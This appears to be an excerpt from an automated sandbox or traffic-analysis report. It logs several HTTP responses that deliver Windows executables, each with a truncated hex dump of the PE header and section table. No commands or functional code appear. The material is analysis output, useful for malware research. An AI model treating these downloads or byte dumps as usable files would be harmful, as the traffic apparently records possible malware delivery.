00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:09 GMTContent-Type: application/octet-streamContent-Length: 510976Last-Modified: Sat, 15 Feb 2025 07:09:09 GMTConnection: keep-aliveETag: "67b03d95-7cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 c7 81 a7 03 a6 ef f4 03 a6 ef f4 03 a6 ef f4 71 27 ea f5 8e a6 ef f4 71 27 eb f5 0f a6 ef f4 71 27 ec f5 04 a6 ef f4 71 27 ee f5 00 a6 ef f4 03 a6 ee f4 6b a6 ef f4 12 20 ec f5 0a a6 ef f4 12 20 eb f5 13 a6 ef f4 12 20 ea f5 2f a6 ef f4 80 20 ea f5 02 a6 ef f4 80 20 ed f5 02 a6 ef f4 52 69 63 68 03 a6 ef f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 13 0f b0 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 f0 06 00 00 ea 00 00 00 00 00 00 0c fe 05 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 9f 07 00 28 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 d4 16 00 00 00 00 00 00 00 00 00 00 00 00 08 00 94 06 00 00 00 7f 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7d 07 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 ee 06 00 00 10 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 a8 00 00 00 00 07 00 00 aa 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 1c 00 00 00 b0 07 00 00 0c 00 00 00 9e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 d4 16 00 00 00 d0 07 00 00 18 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 66 70 74 61 62 6c 65 00 01 00 00 00 f0 07 00 00 02 00 00 00 c2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 94 06 00 00 00 00 08 00 00 08 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
